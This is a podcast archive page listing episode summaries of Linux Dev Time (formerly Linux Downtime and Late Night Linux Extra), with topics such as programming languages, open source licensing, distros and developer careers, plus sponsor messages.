Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 124

It’s another hot questions episode. Tabs vs spaces, whether we have imposter syndrome, why software keeps getting heavier, the correct length of functions and files, and what every programmer should know.

 

Some things we mentioned:

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 123

Andy is convinced that functional programming isn’t boring. Listen to find out if he’s right!

 

Functional Programming & Haskell

Beautiful Racket

Functional Programming & Haskell – Computerphile

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 122

We’ve done hot takes episodes in the past but this is different, it’s hot questions. Would we rather have bad managers who can code or good managers who can’t? Too many comments or none? 80 columns or as long as you like? What editor do we use and why?

 

Vim for Fun or PeerTube version

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 121

Joe accidentally tried vibe coding and it was as much of a disaster as you’d imagine. Amolith has also tried it, and does his best to defend the use of LLMs with development. Kevin and Andy are mostly bemused. We all have concerns about the ethics and environmental issues.

This episode has a bit more bad language than usual.

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 120

Our advice on how to move into a career in software development including making and contributing to projects, advocating for your work, collaborating, avoiding exploitation, learning Git, and loads more.

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 117

Mark from Linux Matters who’s a web developer joins us to talk about working in PHP – a language that’s mature and well established, and how that compares with working with newer “cooler” languages like Rust and Go.

 

Moodle

Mark’s Bash text adventure

Bash associative array examples

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 116

Where is the balance between efficiency and openness when it comes to saved file formats? If everything was based on plain text it would make the files readable for years to come, but at what cost?

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 115

We dig into SQLite – an interesting and unusual project that is widely used but has an uncommon licence, a proprietary test suite, and doesn’t take external contributions. Plus printf() vs “proper” debugging.

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 114

We explore the line between developer and sysadmin and come to the conclusion that despite the clear difference between the roles, there is a lot of crossover when it comes to skills and character traits.

 

The Six Dumbest Ideas in Computer Security

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 113

We are joined by popey from Linux Matters to talk about how software packaging has changed over the years. The tooling has improved massively, containerisation has made a huge impact, but Andy still prefers the old distro repo model.

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 112

More of our development hot takes including excessive energy use, optimising your code, the importance of licences, Matrix and Jabber being on the same side, the myth of secure code, and why self-hosting is hard.

watt-wiser

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 111

Some of the work-adjacent things that we do including writing code that we shouldn’t like writing Rust in Rust, fun projects that turned into paid work, and career progression. Plus some of our go to resources for learning about development.

 

Some resources we mentioned

Andy’s videos – Rust, General

Lobsters

Amolith’s RSS feeds

Computer inside Terraria

Fasterthanlime

Self-Directed Research Podcast

Jon Gjengset

Jon Gjengset – YouTube

DevConf – YouTube

MEAP Catalog

 

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 109

You need to be able to write good code to be a successful developer, but how important are other “soft” skills like communication, relating to and motivating others, and time management?

Kevin mentioned a blog post about burnout in the Rust project

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 107

What is it about Linux that draws us to it as a development platform? Plus why we choose the specific distros that we use.

 

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 105

Kevin and Andy talk about their project extremes: the oldest and newest projects they’ve worked on, the biggest and smallest codebases, the ugliest hack, the most elegant, the most popular, the most trivial, and the most important.

 

Andy’s links

git-what

IGCC

Box Stacker

Rightwaves

Eat Apples Quick!

Smolpxl Games

Rabbit Escape Android Game

element-web

matrix-rust-sdk

FreeGuide

i-dunno

Announcing I-DUNNO 1.0 and web-i-dunno

qdsync

 

Kevin’s links

clap

clog-cli

clog-lib

typed-oid

usbwatch-rs

baseline

iptables_exporter

wireguard_exporter

CLI2048

violin

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 104

How to deal with a horrible codebase that you’ve inherited. Getting started, breaking the problem into smaller pieces, understanding what’s actually wrong, the importance of testing (as usual), and why technical debt isn’t necessarily the best name for the problem.

 

Working Effectively with Legacy Code

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 103

Developing as part of an in-person team vs working remotely, synchronous vs asynchronous development, how to make a hybrid team work effectively, and how code review fits into it all.

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 102

What agile software development is exactly, why planning and being willing to adapt the plan are key, the pros and cons of all the process that’s involved, the role that scrum plays, and why it’s all about communication.

 

Study finds 268% higher failure rates for Agile software projects

Amolith will be at Fossy in August.

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 101

Andy is annoyed that so much free and open source software is hosted on a proprietary platform that’s owned by Microsoft. There are plenty of alternatives to GitHub, but ultimately the network effect is why so many people host their code there. We dream of a proper federated solution. Maybe one day…

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 100

If you want to be a good developer, how many different programming languages should you learn? Maybe becoming an expert in one specific language is the way to go. Maybe it’s more a case of learning different concepts and paradigms than languages.

 

 

 

 

1Password

Extended Access Management: Secure every sign-in for every app on every device. Support the show and check it out at 1password.com/linuxdevtime

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 99

Forks are a fundamental aspect of open source software so we get into the different types of forks, when and why you might want to fork a project, the maintenance burden that comes with a hard fork, the importance of winning mindshare for your fork, what exactly counts as a fork, when it’s not always a great idea to fork, and more.

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 98

We are joined by Allan Jude to talk about what it’s like to run a company that develops and maintains open source software with a focus on upstreaming as much code as possible.

 

Klara

November 2023 FreeBSD Vendor Summit – The Value of Upstream First

How to upstream code to open source projects

FiloSottile (Filippo Valsorda)

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 97

Andy is a huge proponent of test-driven development and explains why – including types of code testing including unit tests and integration tests, when you actually need to run tests, how long they should take, and more.

 

Emily Bache

cyber‑dojo

Test with Go

 

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 96

Kevin and Andy answer Joe’s noob questions about development including the differences between compiled and interpreted languages, C vs C++, why the Linux kernel is written in C, Go vs Rust, and what memory safety means.

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 95

We are joined by Drew DeVault to discuss his programming language called Hare, which aims for 100 years of forwards compatibility.

We mentioned Drew’s blog posts Can I be on your podcast? and It takes a village

 

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 94

How we first learned to code, and how we learn new technologies now.

Snake in Terraform
Snake in lots of languages
Web server in Sinclair BASIC

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 93

What we’ve learned over the years about the interview process for software development jobs, both as the applicant and the interviewer.

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 92

The automation tools we use in our development and why we use them. Plus how to engage with your project’s community – both in real time, and asynchronously.

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 91

Andy Balaam joins us to talk about accepting contributions from devs with varying levels of experience. When to invest the time to mentor them, why documentation is important, how automated tools fit in, being willing to decline some contributions, dealing with companies vs individuals, and more.

 

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 90

How we use AI coding assistants like GitHub Copilot, what they have done to the development industry, what might happen in the future, and the ethics of the whole thing. With guest host Linus.

 

 

 

Kolide

Kolide ensures that if a device isn’t secure it can’t access your apps.  It’s Device Trust for Okta. Visit kolide.com/linuxdevtime to learn more.

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

 

💾

  •  

Linux Dev Time – Episode 89

We follow up on last episode with some clarifications from Amolith about code collaboration. Plus we get into development workflows in general, code review, the paradigms we couldn’t do without, and more. With guest host Linus.

 

Amolith mentioned a Low energy game jam.

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

 

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 88

When it comes to collaboration workflows, Amolith dislikes the pull request model that GitHub made popular and much prefers the email/patch-based approach. Kevin does his best to get to the bottom of why, and Joe wonders if it might come down to disliking Microsoft.

 

Your GitHub pull request workflow is slowing everyone down

Graphite

git-branchless

 

 

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Dev Time – Episode 87

Linux Downtime is now Linux Dev Time!

In this first episode we talk about “sharpening our tools” – changing your dev tools, trying out new languages, using existing code vs writing something new, how to get over creative blocks, and more.

 

How Often Should We Sharpen Our Tools?

 

 

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

💾

  •  

Linux Downtime – Episode 86

Kevin joins us to talk about the hype that surrounds some programming languages like Rust and Python, how some languages like Java went out of fashion, and why the likes of PHP never saw much hype at all. With guest host Jim from 2.5 Admins.

 

Kevin’s Twitter

Kevin’s Mastodon

Clap

 

 

 

 

Factor

Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 85

There’s a meme that software developers should be forced to use low end hardware to experience what it’s like to be a real user. So what hardware should devs actually use to test their software? How does this differ for GUI and CLI applications? With guest host Jim from 2.5 Admins.

 

 

 

HelloFresh

With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get free breakfast for life at hellofresh.com/ldtfree using code ldtfree. (One breakfast item per box while subscription is active).

 

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 84

We are joined by Roger Light to discuss what it’s like to work for a company that uses the open core model maintaining an open source project and offering additional paid for proprietary features. With guest host Jim from 2.5 Admins.

 

Mosquitto

Cedalo

 

 

 

Factor

Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 83

We are joined by Marcin Kulik – the creator and maintainer of asciinema. We talk about the project itself, developing on Linux, IDEs, targetting a technical audience, the advantages of writing for a command line interface, why -R is always wrong for the recursive flag, and more. With guest host Jim from 2.5 Admins.

Marcin on Mastodon

asciinema on Mastodon

asciinema on Matrix

 

 

 

 

HelloFresh

With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get 50% off plus free shipping at hellofresh.com/50ldt using code 50ldt.

 

 

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 82

Jim Salter joins us to talk about getting the most out of your open source project. From designing and planning, to attracting contributors, considering the correct scope, building on top of existing software, and more.

 

Sanoid and Syncoid

Perlpv

Jim’s website

Jim’s social media links

2.5 Admins podcast

 

 

 

Factor

Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 81

How to get hired for your first development job, more on contributor license agreements, and our thoughts on different immutable OS approaches.

 

Fiduciary Licence Agreement (FLA) – FSFE

Why the FSF Gets Copyright Assignments from Contributors

 

 

 

 

HelloFresh

With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get 50% off plus 15% off the next 2
months at hellofresh.com/50ldt using code 50ldt.

 

 

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 80

We are joined by Element developer Andy Balaam to talk about working on open source software after 20 years in the proprietary world. We get into working in public, the realities of accepting code contributions, being part of a distributed team, the pros and cons of working from home, and more.

 

Andy’s links:

Live streams

Website and blog

Andy’s programming videos

Retro games

 

 

 

 

Factor

Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 79

We are all on board with the right to be forgotten but it can cause some tricky problems for open source projects – particularly small ones. Plus why we won’t stop going on about why we take such a dim view of crypto.

Amolith mentioned a toot from the Tor Project.

 

 

 

HelloFresh

With HelloFresh, you get farm-fresh, pre-portioned ingredients and seasonal recipes delivered right to your doorstep. Get 50% off and free shipping at hellofresh.com/50ldt using the promo code 50ldt.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 77

Contributor license agreements aren’t very popular, but not having a CLA can cause problems for projects in the future. Gary can’t do things like publishing Pidgin on Apple’s app stores, and Amolith is wrestling with how to keep his options open for the SaaS project he’s working on.

Don’t sign a CLA

Seriously, don’t sign a CLA

 

 

 

Factor

Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 76

We are joined by Chris Waldon to talk about how to get started with coding and software development.

Chris mentioned his blog.

 

 

 

Factor

Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 75

Is there really a renaissance in open communication tools? Does the success of the Fediverse mean that people are finally moving away from the huge companies that lock your data up? Are FOSS people just living in a bubble while the world continues to use the big platforms? How does Meta/Facebook joining the Fediverse fit into the picture? What about Bluesky?

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 74

Jorge tries to address Félim‘s concerns about immutable desktop distros like Silverblue and Universal Blue.

 

 

Factor

Factor’s fresh, never frozen, meals are ready in just 2 minutes, so all you have to do is heat them up and enjoy. Go to factormeals.com/ldt50 and use code ldt50 to get 50% off your first box.

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 72

Part 2 of our chat with Molly White from Web3 is Going Just Great. This time we talk about Mastodon and the Fediverse, central bank digital currencies, cashless societies, the hype around AI, corporate surveillance, and more.

Check out part 1 here

Molly’s Mastodon

 

 

 

ServerMania

ServerMania offers a wide range of fully customizable dedicated, cloud, colocation, and IP Transit services, and free initial consultations. Go to servermania.com/ldt and use the promo code linuxdowntime to get 15% off dedicated servers – recurring for life.

 

 

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

 

💾

  •  

Linux Downtime – Episode 71

We are joined by Molly White from Web3 is Going Just Great to talk about the issues with crypto, Bitcoin, the Lightning network, blockchain, NFTs, and “web3”.

 

Molly’s Mastodon

 

 

Amolith will be at SELF June 9-11 in Charlotte NC.

 

 

 

ServerMania

ServerMania offers a wide range of fully customizable dedicated, cloud, colocation, and IP Transit services, and free initial consultations. Go to servermania.com/ldt and use the promo code linuxdowntime to get 15% off dedicated servers – recurring for life.

 

💾

  •  

Linux Downtime – Episode 70

Liam from Gaming on Linux joins us to talk about the current state of Linux gaming, the Steam Deck, how things progressed to this point, Valve being the driving force behind it all, whether the lack of native Linux games matters when Proton exists, and loads more.

 

Gaming on Linux YouTube channel

 

Check out Linux Matters

 

 

 

ServerMania

ServerMania offers a wide range of fully customizable dedicated, cloud, colocation, and IP Transit services, and free initial consultations. Go to servermania.com/ldt and use the promo code linuxdowntime to get 15% off dedicated servers – recurring for life.

 

 

 

 

 

See our contact page for ways to get in touch.

 

Subscribe to the RSS feed.

💾

  •  

Linux Downtime – Episode 49

Kyle joins us again, along with Hayden Barnes to answer the question: what exactly is a Linux distribution these days? The rise of immutable filesystems, containerisation, virtualisation, hypervisors, and abstraction layers makes this more complex than it might appear.

 

Buy Hayden’s book about WSL.

 

 

 

 

Vultr

High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.

 

Kolide

Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov

 

 

See our contact page for ways to get in touch.

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Linux Downtime – Episode 48

Martin and Joe are joined by Kyle Fazzari to reimagine the Linux desktop. What we’d do differently if we were starting over today, who we’d aim it at, what packaging system we’d use, what interface, and more.

 

Kyle’s Twitter thread

 

 

 

Vultr

High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.

 

Kolide

Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov

 

 

See our contact page for ways to get in touch.

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Linux Downtime – Episode 47

How do you progress your career as a FOSS enthusiast?

 

 

Vultr

High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.

 

Kolide

Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov

 

 

See our contact page for ways to get in touch.

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Linux Downtime – Episode 46

Adam tries to sell Fedora to Joe and Martin, two Ubuntu (flavour) users.

 

 

 

Vultr

High-performance cloud compute, bare metal, and storage in 25 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.

 

Kolide

Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov

 

 

See our contact page for ways to get in touch.

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Linux Downtime – Episode 45

Joe and Adam are joined by Martin Wimpress to talk about what goes into running a distro like Ubuntu Mate. Governance and finances, the benefits of being an official Ubuntu flavour, hardware enablement, and more.

 

 

Vultr

High-performance cloud compute, bare metal, storage, and managed Kubernetes in 24 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.

 

Kolide

Endpoint Security for Teams That Slack – Try for Free Today! https://l.kolide.co/3iIyKov

 

 

See our contact page for ways to get in touch.

 

💾

  •  

Linux Downtime – Episode 44

Joe is joined by Alex Kretzschmar from the Self-Hosted podcast to talk about what and why Alex self-hosts, the hardware and software he uses, and how his approaches have changed over the years.

 

Alex mentioned his Twitter, his blog, a specific blog post about transcoding video, and Serverbuilds.net.

 

 

 

 

Vultr

High-performance cloud compute, bare metal, storage, and managed Kubernetes in 24 locations all over the world. Go to getvultr.com/ldt to sign up and get $150 free credit to use in 30 days.

 

See our contact page for ways to get in touch.

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Linux Downtime – Episode 39

Joe is joined by Jorge Castro to talk about distros with immutable filesystems like Fedora Silverblue, and Flatpak and Flathub.

 

Jorge mentioned:

His list of resources

Setting yourself up for success before trying Fedora Silverblue

distrobox

ublue

sodalite

Ideas on growing the Flathub Community in 2022

An example command for zoom which will show you what the app sees:
flatpak run –command=sh –devel us.zoom.Zoom

 

 

[This show used to be called Late Night Linux Extra. Don’t worry, the fabric of reality isn’t breaking down.]

 

 

See our contact page for ways to get in touch.

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 37

Joe is joined by Chris from Linux After Dark and Fedora user Adam Dean to discuss using GNOME and why we shouldn’t bash it so often. Adam wrote a book called the Linux Administration Cookbook.

 

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 36

Joe is joined by Allan Jude from the 2.5 Admins and BSD Now podcasts to talk about FreeBSD. Allan mentioned his company Klara.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 35

Joe is joined by Carl George, a Principal Software Engineer at Red Hat, to discuss Fedora, RHEL, CentOS Linux, and CentOS Stream.

Carl is a regular in the Linux Unplugged Mumble room. We mentioned Carl’s Twitter thread about the relationship between Fedora, RHEL, and CentOS.

 

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 34

Joe and Alex from the Self-Hosted podcast discuss DockerSlim and Slim AI with Martin Wimpress. Martin mentioned SlimDevOps on Twitch.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 33

Joe is joined by Btrfs advocate Neal Gompa and ZFS advocate Jim Salter (from 2.5 Admins) to discuss Jim’s recent criticism of Btrfs.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 32

Joe is joined by Gary Kramlich, the Pidgin project maintainer. Gary mentioned the contributing page, and the upcoming State of the Bird event which will be streamed on his Twitch channel.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 31

Joe is joined by Alyssa Rosenzweig, a graphics developer who’s passionate about software freedom and leads the Panfrost and Asahi graphics drivers, about porting Linux to the M1 Macs.

 

Gary, Chris and Dalton haven’t disappeared. We’ve launched a new show called Linux After Dark.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

 

💾

  •  

Late Night Linux Extra – Episode 30

Dalton gives us his first impressions of the Framework laptop, why we didn’t talk about AMD mobile CPUs when the M1 came up, and what we do when the software we want isn’t in the main repo.

 

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 29

Gary, Chris, Dalton, and Joe discuss reporting bugs, why we don’t always do it, and why we really should.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 28

Gary, Chris, and Joe are joined by Dalton to discuss whether platforms really matter in an age where they all offer so much choice with Virtualization, WSL, proton, and cloud desktops etc.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 27

Gary, Chris, and Joe cover some of your feedback about why we use traditional GTK desktops rather than Plasma or a tiling window manager, why we don’t use MikroTik network gear, and Joe’s “homelab”.

 

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 26

Joe talks to Chris and Gary about their homelab setups, their use of the cloud, and how it all ties together with WireGuard.

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

